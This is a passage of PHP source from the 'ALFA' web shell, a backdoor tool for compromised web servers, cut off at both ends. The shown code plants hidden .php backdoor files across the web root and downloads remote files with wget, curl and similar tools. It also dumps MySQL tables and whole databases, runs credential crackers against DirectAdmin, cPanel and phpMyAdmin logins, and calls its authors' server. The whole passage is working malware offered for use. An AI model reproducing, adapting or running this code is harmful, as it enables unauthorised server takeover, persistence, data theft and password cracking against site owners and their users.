VALUES("\'.$shell.\'")\');\r\n@file_put_contents($file,$code."\\n".@file_get_contents($file));\r\n__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.\'</font>\');}else{__alert($error);}}}}\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\n\r\nif (@!$_SESSION["alfa07"]) {$doc = $_SERVER["DOCUMENT_ROOT"];$dir = scandir($doc);$d1 = \'\' . $doc . \'/.\';$d2 = \'\' . $doc . \'/..\';if (($key = @array_search(\'.\', $dir)) !== false) {\r\n        unset($dir[$key]);unset($dir[$key]);}if (($key = @array_search($d1, $dir)) !== false) {unset($dir[$key]);}if (($key = array_search($d2, $dir)) !== false) {unset($dir[$key]);}@array_push($dir, $doc);foreach ($dir as $d) {$p = $doc . "/" . $d;if (is_dir($p)) {$file = $p . "/.".$d.".php";@touch($file);$folder = @fopen($file, "w");@fwrite($folder, $alfasuccess);} }}\r\nfunction alfawhois(){\r\necho("<div class=\'header\'><center><p><div class=\'txtfont_header\'>| Whois |</div></p><p><form onsubmit=\\"g(\'whois\',null,this.url.value,\'>>\');return false;\\"><div class=\'txtfont\'>Url: </div> <input type=\'text\' name=\'url\' style=\'text-align:center;\' size=\'50\' placeholder=\'google.com\'> <input type=\'submit\' value=\' \'></form></p></center>");\r\nif($_POST[\'alfa2\']==\'>>\'&&!empty($_POST[\'alfa1\'])){\r\n$site = str_replace(array(\'http://\',\'https://\',\'www.\',\'ftp://\'),\'\',$_POST[\'alfa1\']);\r\n$target = \'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=\'.$site;\r\n$data = @file_get_contents($target);\r\nif($data==\'\'){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}\r\n$target = @json_decode($data,true);\r\necho __pre();\r\nif(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}\r\necho("</div>");\r\n}\r\nfunction alfaremotedl(){\r\nalfahead();\r\necho("<div class=\'header\'><center><p><div class=\'txtfont_header\'>| Upload From Url |</div></p><p>\r\n<form onsubmit=\\"g(\'remotedl\',null,this.d.value,this.p.value,\'>>\');return false;\\">\r\n<p><div class=\'txtfont\'>Url: </div>&nbsp;&nbsp;&nbsp;<input type=\'text\' name=\'d\' size=\'50\'></p>\r\n<div class=\'txtfont\'>Path:</div> <input type=\'text\' name=\'p\' size=\'50\' value=\'".$GLOBALS[\'cwd\']."\'><p><input type=\'submit\' value=\' \'></p>\r\n</form></p></center>");\r\nif(isset($_POST[\'alfa1\'],$_POST[\'alfa2\'],$_POST[\'alfa3\'])&&!empty($_POST[\'alfa1\'])&&$_POST[\'alfa3\']==\'>>\'){\r\necho __pre();\r\n$url = $_POST[\'alfa1\'];\r\n$path = $_POST[\'alfa2\'];\r\necho(\'<center>\');\r\nif(__download($url,$path)){\r\necho(\'<font color="green">Success...!</font>\');\r\n}else{\r\necho(\'<font color="red">Error...!</font>\');\r\n}\r\necho(\'</center>\');\r\n}\r\necho("</div>");\r\nalfafooter();\r\n}\r\nfunction __download($url,$path=false){\r\nif(!preg_match("/[a-z]+:\\/\\/.+/",$url)) return false;\r\n$saveas = basename(rawurldecode($url));\r\nif($path){$saveas=$path.$saveas;}\r\nif($content = __read_file($url)){\r\nif(@is_file($saveas))@unlink($saveas);\r\nif(__write_file($saveas, $content)){return true;}}\r\n$buff = alfaEx("wget ".$url." -O ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("curl ".$url." -o ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("lwp-download ".$url." ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("lynx -source ".$url." > ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("GET ".$url." > ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("links -source ".$url." > ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("fetch -o ".$saveas." -p ".$url);\r\nif(@is_file($saveas)) return true;\r\nreturn false;\r\n}\r\nfunction clean_string($string){\r\n  if(function_exists("iconv")){\r\n\t  $s = trim($string);\r\n\t  $s = iconv("UTF-8", "UTF-8//IGNORE", $s);\r\n  }\r\n  return $s;\r\n}\r\nfunction __read_file($file, $boom = true){\r\n$content = false;\r\nif($fh = @fopen($file, "rb")){\r\n$content = "";\r\nwhile(!feof($fh)){\r\n$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);\r\n}\r\n@fclose($fh);\r\n}\r\nif(empty($content)||!$content){\r\n\t$content = alfaEx("cat \'".addslashes($file)."\'");\r\n}\r\nreturn $content;\r\n}\r\nfunction alfaMarket(){\r\necho "<div class=\'header\'>";\r\n$curl = new AlfaCURL();\r\n$content = $curl->Send("http://solevisible.com/market.ph");\r\n$data = @json_decode($content, true);\r\nif(!empty($data)){\r\nif($data["status"] == "open"){\r\n\techo $data["content"];\r\n}else{\r\n\techo $data["error_msg"];\r\n}\r\n}else{\r\n\techo "<div style=\'text-align:center;font-size:20px;\'>Cant connect to the alfa market....! try later.</div>";\r\n}\r\necho "</div>";\r\n}\r\nfunction alfaSettings(){\r\nalfahead();\r\nAlfaNum(6,7,8,9,10);\r\necho \'<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\\\'settings\\\',null,null,null,null,null,null,null,null,\\\'main\\\')">| Generall Setting | </a></h3></center>\';\r\nif($_POST["alfa8"] == "main"){\r\necho \'<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\\\'post\\\'>\';\r\n$lg_array = array(\'0\'=>\'No\',\'1\'=>\'Yes\');\r\n$penc_array = array(\'false\'=>\'No\',\'true\'=>\'Yes\');\r\n$protect_html = "";\r\n$icon_html = "";\r\n$postEnc_html = "";\r\n$login_html = "";\r\n$cgiapi_html = "";\r\nforeach($lg_array as $key=>$val)$protect_html .= \'<option value="\'.$key.\'" \'.($GLOBALS[\'DB_NAME\'][\'safemode\']==\'1\'?\'selected\':\'\').\'>\'.$val.\'</option>\';\r\nforeach($lg_array as $key=>$val)$icon_html .= \'<option value="\'.$key.\'" \'.($GLOBALS[\'DB_NAME\'][\'show_icons\']==\'1\'?\'selected\':\'\').\'>\'.$val.\'</option>\';\r\nforeach($penc_array as $key=>$val)$cgiapi_html .= \'<option value="\'.$key.\'" \'.(!empty($_POST[\'alfa9\'])&&$_POST[\'alfa9\']==$key?"selected":($GLOBALS["DB_NAME"]["cgi_api"]&&empty($_POST[\'alfa9\'])?\'selected\':\'\')).\'>\'.$val.\'</option>\';\r\nforeach($penc_array as $key=>$val)$postEnc_html .= \'<option value="\'.$key.\'" \'.(!empty($_POST[\'alfa7\'])&&$_POST[\'alfa7\']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST[\'alfa7\'])?\'selected\':\'\')).\'>\'.$val.\'</option>\';\r\n$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");\r\nforeach($lg_array as $key=>$val)$login_html .= \'<option value="\'.$key.\'" \'.($GLOBALS[\'DB_NAME\'][\'login_page\']==$key?\'selected\':\'\').\'>\'.$val.\'</option>\';\r\necho \'\';\r\necho \'<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">\'.$protect_html.\'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">\'.$cgiapi_html.\'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">\'.$postEnc_html.\'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">\'.$icon_html.\'</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">\'.$login_html.\'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="\'.(empty($_POST[\'alfa3\'])?$GLOBALS[\'DB_NAME\'][\'user\']:$_POST[\'alfa3\']).\'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="\'.$GLOBALS[\'DB_NAME\'][\'safemode\'].\'"><input type="hidden" name="s" value="\'.$GLOBALS[\'DB_NAME\'][\'show_icons\'].\'"><p><input type="submit" name="btn" value=" "></p></form></center>\';\r\nif($_POST[\'alfa5\']==\'>>\'){\r\necho __pre();\r\nif(!empty($_POST[\'alfa3\'])){\r\n$protect = $_POST[\'alfa1\'];\r\n$lgpage = $_POST[\'alfa2\'];\r\n$username = $_POST[\'alfa3\'];\r\n$password = md5($_POST[\'alfa4\']);\r\n$icon = $_POST[\'alfa6\'];\r\n$post_encrypt = $_POST[\'alfa7\'];\r\n$cgi_api_val = $_POST[\'alfa9\'];\r\n@chdir($GLOBALS[\'home_cwd\']);\r\n$basename = @basename($_SERVER[\'PHP_SELF\']);\r\n$data = @file_get_contents($basename);\r\n$user_rand = $GLOBALS["DB_NAME"]["user_rand"];\r\n$pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];\r\n$login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];\r\n$safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];\r\n$show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];\r\n$post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];\r\n$cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];\r\n$find_user = \'/\\\'\'.$user_rand.\'\\\'(.*?),/i\';\r\n$find_pw = \'/\\\'\'.$pass_rand.\'\\\'(.*?),/i\';\r\n$find_lg = \'/\\\'\'.$login_page_rand.\'\\\'(.*?),/i\';\r\n$find_p = \'/\\\'\'.$safemode_rand.\'\\\'(.*?),/i\';\r\n$icons = \'/\\\'\'.$show_icons_rand.\'\\\'(.*?),/i\';\r\n$postEnc = \'/\\\'\'.$post_encryption_rand.\'\\\'(.*?),/i\';\r\n$cgi_api_reg = \'/\\\'\'.$cgi_api_rand.\'\\\'(.*?),/i\';\r\nif(!empty($username)&&preg_match($find_user,$data,$e)){\r\n$new = \'\\\'\'.$user_rand.\'\\\' => \\\'\'.$username.\'\\\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(!empty($_POST[\'alfa4\'])&&preg_match($find_pw,$data,$e)){\r\n$new = \'\\\'\'.$pass_rand.\'\\\' => \\\'\'.$password.\'\\\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(!empty($lgpage)&&preg_match($find_lg,$data,$e)){\r\n$new = \'\\\'\'.$login_page_rand.\'\\\' => \\\'\'.$lgpage.\'\\\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(!empty($find_p)&&preg_match($find_p,$data,$e)){\r\n$new = \'\\\'\'.$safemode_rand.\'\\\' => \\\'\'.$protect.\'\\\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(preg_match($icons,$data,$e)){\r\n$new = \'\\\'\'.$show_icons_rand.\'\\\' => \\\'\'.$icon.\'\\\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(preg_match($postEnc,$data,$e)){\r\n$new = \'\\\'\'.$post_encryption_rand.\'\\\' => \'.$post_encrypt.\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(preg_match($cgi_api_reg,$data,$e)){\r\n$new = \'\\\'\'.$cgi_api_rand.\'\\\' => \'.$cgi_api_val.\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(@file_put_contents($basename,$data)){\r\necho \'<b>UserName: </b><font color="green"><b>\'.$username.\'</b></font><br /><b>Password: </b><font color="green"><b>\'.$_POST[\'alfa4\'].\'</b></font><script>post_encryption_mode = \'.$post_encrypt.\';</script>\';\r\n}else{\r\n__alert("<span style=\'color:red;\'>File has no edit access...!</span>");\r\n}\r\n}else{\r\n__alert("<span style=\'color:red;\'>UserName is Empty !</span>");\r\n}\r\n}\r\n}elseif($_POST["alfa8"] == "color"){\r\necho(\'<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\\\'post\\\'>\');\r\necho \'<table border="1"><tbody>\';\r\n$template = \'<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>\';\r\n$x = 1;\r\nforeach($GLOBALS[\'__ALFA_COLOR__\'] as $key => $value){\r\n\t$multi = "";\r\n\tif(is_array($value)){\r\n\t\tif(isset($value["multi_selector"])){\r\n\t\t\t$multi = __ZW5jb2Rlcg(json_encode($value));\r\n\t\t}\r\n\t}\r\n\t$value = alfa_getColor($key);\r\n\t$help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));\r\n\techo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);\r\n}\r\necho \'<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>\';\r\n\r\necho \'</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\\\'importFileBtn\\\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\\\'settings\\\',null,null,null,null,null,null,null,\\\'export\\\',\\\'color\\\')" class="button"> Export </button></center></p>\';\r\nif($_POST[\'alfa7\']==\'export\'){\r\n\techo __pre();\r\n\t$colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();\r\n\t$glob_colors = $GLOBALS["__ALFA_COLOR__"];\r\n\t$array = array();\r\n\tforeach($glob_colors as $k => $v){\r\n\t\tif(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){\r\n\t\t\t$v = trim($colors[$k]);\r\n\t\t}else{\r\n\t\t\t$v = trim(is_array($v)?$v["key_color"]:$v);\r\n\t\t}\r\n\t\t$array[$k] = $v;\r\n\t}\r\n\t$file = "alfa_color_config_".date(\'Y-m-d-h_i_s\').".conf";\r\n\t$config = json_encode($array, JSON_PRETTY_PRINT);\r\n\tif(!@file_put_contents($file, $config)){\r\n\t\techo(\'<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">\'.$config.\'</textarea></center></p>\');\r\n\t}else{\r\n\t\techo(\'<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\\\'FilesTools\\\',null,\\\'\'.$file.\'\\\', \\\'download\\\')"><font color="#0F0">Download Config</font></a></center></p></h3>\');\r\n\t}\r\n}\r\nif($_POST[\'alfa2\']==\'>>\'){\r\n\techo __pre();\r\n\t$colors = json_decode($_POST["alfa1"],true);\r\n\t$array = "";\r\n\t$is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;\r\n\t$glob_colors = $GLOBALS["__ALFA_COLOR__"];\r\n\tforeach($glob_colors as $k => $v){\r\n\t\tif(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){\r\n\t\t\t$v = trim($colors[$k]);\r\n\t\t}else{\r\n\t\t\t$v = trim(is_array($v)?$v["key_color"]:$v);\r\n\t\t}\r\n\t\t$array .= \'"\'.trim($k).\'" => "\'.$v.\'",\';\r\n\t}\r\n\t@chdir($GLOBALS[\'home_cwd\']);\r\n\t$basename = @basename($_SERVER[\'PHP_SELF\']);\r\n\t$data = @file_get_contents($basename);\r\n\t$color = \'/\\\'color\\\'(.*?)\\),/s\';\r\n\tif(preg_match($color,$data,$e)){\r\n\t\t$new = "\'color\' => array(".$array."),";\r\n\t\t$data = str_replace($e[0],$new,$data);\r\n\t\tif(@file_put_contents($basename, $data)){\r\n\t\t\techo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");\r\n\t\t}else{\r\n\t\t\techo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");\r\n\t\t}\r\n\t}else{\r\n\t\techo("<center><p><h3>[-] Error...!</h3></p></center>");\r\n\t}\r\n}\r\n}\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction alfaaboutus(){\r\nalfahead();\r\necho \'<div class="header">\';\r\n$news = new AlfaCURL();\r\n$about_us = $news->Send("http://solevisible.com/aboutus.php");\r\nif(empty($about_us)){\r\n$about_us = "<pre><center><img src=\'http://solevisible.com/images/farvahar-iran.png\'><br>\r\n<b><font size=\'+3\' color=\'#00A220\'>&#9774; ~ PEACE ~ &#9774;</font><br><b>\r\n<font color=\'#00A220\'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>\r\n<font color=\'#00A220\'>Contact : solevisible@gmail.com</font><br>\r\n<font color=\'#00A220\'>Telegram Channel: @solevisible</font><br>\r\n<font color=\'#FFFFFF\'>Skype : ehsan.invisible</font><br>\r\n<font color=\'#FFFFFF\'>Skype : sole.sad</font><br>\r\n<font color=\'#FF0000\'>Persian Gulf For Ever</font><br>\r\n<font color=\'#FF0000\'>Iranian Programmers</font><br>\r\n<font color=\'#FF0000\'>############</font><br>\r\n</center></pre><iframe src=\'tg://resolve?domain=solevisible\' frameborder=\'0\' width=\'0\' height=\'0\'></iframe>";\r\n}\r\necho __pre().$about_us;\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction alfacoldumper(){\r\nalfahead();\r\necho(\'<div class="header">\');\r\nAlfaNum(8,9,10);\r\necho "<center><br><div class=\'txtfont_header\'>| Mysql Column Dumper |</div><br><br>".getConfigHtml(\'all\')."<form method=\'post\' onsubmit=\\"var opt_id=this.getAttribute(\'opt_id\');var delimiter=\'json\';try{if($(\'dumper-delimiter-type\').value == \'delimiter\')delimiter=$(\'dumper-delimiter-input\').value}catch(e){};g(\'coldumper\',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;\\"><p>";\r\n$delimiter = (!empty($_POST[\'alfa1\']) ? $_POST[\'alfa1\'] : \'::\');\r\n$selected_data = json_decode($_POST[\'alfa2\'], true);\r\n$username = ($_POST[\'alfa3\']);\r\n$password = ($_POST[\'alfa4\']);\r\n$dbname = ($_POST[\'alfa5\']);\r\n$dfile = ($_POST[\'alfa6\']);\r\n$host = ($_POST[\'alfa7\']);\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_host : \', \'inputName\' => \'db_host\', \'id\' => \'db_host\', \'inputValue\' => $host, \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_username : \', \'inputName\' => \'db_username\', \'id\' => \'db_user\', \'inputValue\' => $username, \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_password : \', \'inputName\' => \'db_password\', \'id\' => \'db_pw\', \'inputValue\' => $password, \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_name : \', \'inputName\' => \'db_name\', \'id\' => \'db_name\', \'inputValue\' => $dbname, \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Output Path: \', \'inputName\' => \'dfile\', \'inputValue\' => htmlspecialchars($GLOBALS[\'cwd\']), \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<br><input type=\'submit\' value=\' \' name=\'Submit\'></p></form></center>";\r\n$db = false;\r\nif(!empty($dbname)){\r\n\t$db = @mysqli_connect($host, $username, $password, $dbname);\r\n}\r\nif(count($selected_data) > 0){\r\n\tif($db){\r\n\t\tif(!is_dir($dfile)){\r\n\t\t\t$dfile = $GLOBALS[\'cwd\'];\r\n\t\t}\r\n\t\t$tbls = "";\r\n\t\t$ext = \'.txt\';\r\n\t\tif($delimiter == \'json\'){\r\n\t\t\t$ext = \'.json\';\r\n\t\t}\r\n\t\tforeach ($selected_data as $tbl => $cols) {\r\n\t\t\t$tables_query = mysqli_query($db, "SELECT ".implode(\',\', $cols)." FROM $tbl");\r\n\t\t\t$file_name = $dfile.\'/\'.$dbname.\'.\'.$tbl.$ext;\r\n\t\t\t$fp = fopen($file_name, "w");\r\n\t\t\t$data = array();\r\n\t\t\twhile($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){\r\n\t\t\t\tif($delimiter == "json"){\r\n\t\t\t\t\t$col_arr = array();\r\n\t\t\t\t\tforeach ($row as $key => $value) {\r\n\t\t\t\t\t\tif(empty($value)){\r\n\t\t\t\t\t\t\t$value = "[empty]";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t $col_arr[$key] = $value;\r\n\t\t\t\t\t}\r\n\t\t\t\t\t$data[$tbl][] = $col_arr;\r\n\t\t\t\t}else{\r\n\t\t\t\t\t$data = "";\r\n\t\t\t\t\tforeach ($row as $key => $value) {\r\n\t\t\t\t\t\tif(empty($value)){\r\n\t\t\t\t\t\t\t$value = "[empty]";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t$data .= $value . $delimiter;\r\n\t\t\t\t\t}\r\n\t\t\t\t\tfwrite($fp, $data ."\\n");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tif($delimiter == "json"){\r\n\t\t\t\tfwrite($fp, json_encode($data));\r\n\t\t\t}\r\n\t\t\tfclose($fp);\r\n\t\t\t$tbls .= "Done ~~~> ".$file_name."<br>";\r\n\t\t}\r\n\t\techo __pre();\r\n\t\techo "<center><font color=\'#00FF00\'>".$tbls."</font></center>";\r\n\t}\r\n}\r\nif(!empty($dbname) && count($selected_data) == 0){\r\n//echo __pre();\r\nif($db){\r\n\techo("<hr><div style=\'text-align:center;margin-bottom:5px;font-weight:bolder;\'><span>[ Select your tables and columns for dumping data ]</span></div>");\r\n\techo("<div style=\'text-align:center;\'><span>Output Type: </span><select id=\'dumper-delimiter-type\' onchange=\'colDumplerSelectType(this);\' name=\'output_type\'><option value=\'delimiter\' selected>delimiter</option><option value=\'json\'>json</option></select><div id=\'coldumper-delimiter-input\' style=\'display:inline;\'><span> Delimiter: </span><input id=\'dumper-delimiter-input\' style=\'text-align:center;\' type=\'text\' name=\'delimiter\' placeholder=\'eg: ,\'></div></div>");\r\n\t$data = array();\r\n\t$tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");\r\n\twhile($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){\r\n\t\t$data[$row["table_name"]] = array();\r\n\t\t$table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row[\'table_name\']."`");\r\n\t\t$table_count = mysqli_fetch_row($table_count_q);\r\n\t\t$data[$row["table_name"]]["data_count"] = $table_count[0];\r\n\t\t$columns_query = mysqli_query($db, "SELECT column_name FROM information_schema.columns WHERE table_name = \'".$row[\'table_name\']."\'");\r\n\t\twhile($row2 = mysqli_fetch_array($columns_query, MYSQLI_ASSOC)){\r\n\t\t\t$data[$row["table_name"]]["cols"][] = $row2["column_name"];\r\n\t\t}\r\n\t}\r\n\tmysqli_close($db);\r\n\r\n\techo \'<ul id="myUL">\';\r\n\tforeach($data as $tbl => $cols){\r\n\t    echo \'<li><span style="color:#00FF00;" class="box">\'.$tbl.\' (\'.$cols["data_count"].\')</span><ul class="nested">\';\r\n\t    foreach($cols["cols"] as $col){\r\n\t        echo \'<li tbl="\'.$tbl.\'"><span style="color:#00FF00;" tbl="\'.$tbl.\'" class="box sub-box">\' . $col . \'</span></li>\';\r\n\t    }\r\n\t    echo \'</ul></li>\';\r\n\t}\r\n\techo \'</ul>\';\r\n}else{\r\necho(\'<center>mysqli_connect : Error!</center>\');\r\n}\r\n}\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction alfaDumper(){\r\nalfahead();\r\necho(\'<div class="header">\');\r\nAlfaNum(8,9,10);\r\necho "<center><br><div class=\'txtfont_header\'>| Mysql Database Dumper |</div><br><br>".getConfigHtml(\'all\')."<form method=\'post\' onsubmit=\\"g(\'dumper\',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\\"><p>";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_host : \', \'inputName\' => \'db_host\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_username : \', \'inputName\' => \'db_username\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_password : \', \'inputName\' => \'db_password\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'db_name : \', \'inputName\' => \'db_name\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Dump Path: \', \'inputName\' => \'dfile\', \'inputValue\' => htmlspecialchars($GLOBALS[\'cwd\']).\'alfa.sql\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<br><input type=\'submit\' value=\' \' name=\'Submit\'></p></form></center>";\r\n$username = ($_POST[\'alfa3\']);\r\n$password = ($_POST[\'alfa4\']);\r\n$dbname = ($_POST[\'alfa5\']);\r\n$dfile = ($_POST[\'alfa6\']);\r\n$host = ($_POST[\'alfa7\']);\r\nif(!empty($dbname)){\r\necho __pre();\r\n$msg = "<center>Check this :  <font color=\'red\'>".$dfile."</font></center>";\r\nif(@mysqli_connect($host,$username,$password,$dbname)){\r\nif(strlen(alfaEx("mysqldump"))>0){\r\nalfaEx("mysqldump --single-transaction --host=\\"$host\\" --user=\\"$username\\" --password=\\"$password\\" $dbname > \'".addslashes($dfile)."\'");\r\necho($msg);\r\n}else{\r\n__alert("Error...!");\r\n}\r\n}else{\r\necho(\'<center>mysqli_connect : Error!</center>\');\r\n}\r\n}\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction Alfa_DirectAdmin_Cracker($info){\r\nif(!$info[\'mysql\'])\r\n$url = $info[\'protocol\'].$info[\'target\'].\':\'.$info[\'port\'].\'/CMD_LOGIN\';\r\nelse $url = $info[\'protocol\'].$info[\'target\'].\'/phpmyadmin\';\r\n$curl = curl_init();\r\ncurl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);\r\ncurl_setopt($curl, CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\');\r\ncurl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);\r\ncurl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);\r\ncurl_setopt($curl, CURLOPT_HEADER,0);\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($curl, CURLOPT_URL,$url);\r\ncurl_setopt($curl, CURLOPT_USERPWD, $info[\'username\'].\':\'.$info[\'password\']);\r\nif($info[\'mysql\'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);\r\n$result = @curl_exec($curl);\r\n$curl_errno = curl_errno($curl);\r\n$curl_error = curl_error($curl);\r\nif ($curl_errno > 0) {echo "<font color=\'red\'>Error: $curl_error</font><br>";}\r\nelseif(preg_match(\'/CMD_FILE_MANAGER|frameset/i\',$result)){\r\necho \'UserName: <font color="red">\'.$info[\'username\'].\'</font> PassWord: <font color="red">\'.$info[\'password\'].\'</font><font color="green">  Login Success....</font><br>\';\r\n$info[\'target\'] = $url;\r\nCrackerResualt($info);\r\n}\r\ncurl_close($curl);\r\n}\r\nfunction Alfa_CP_Cracker($info){\r\n$url = $info[\'protocol\'].$info[\'target\'].\':\'.$info[\'port\'];\r\n$curl = curl_init();\r\ncurl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);\r\ncurl_setopt($curl, CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0\');\r\ncurl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);\r\ncurl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);\r\ncurl_setopt($curl, CURLOPT_HEADER,0);\r\ncurl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\ncurl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info[\'username\'].":".$info[\'password\']) . "\\n\\r"));\r\ncurl_setopt($curl, CURLOPT_URL, $url);\r\n$result = @curl_exec($curl);\r\n$curl_errno = curl_errno($curl);\r\n$curl_error = curl_error($curl);\r\nif ($curl_errno > 0) {echo "<font 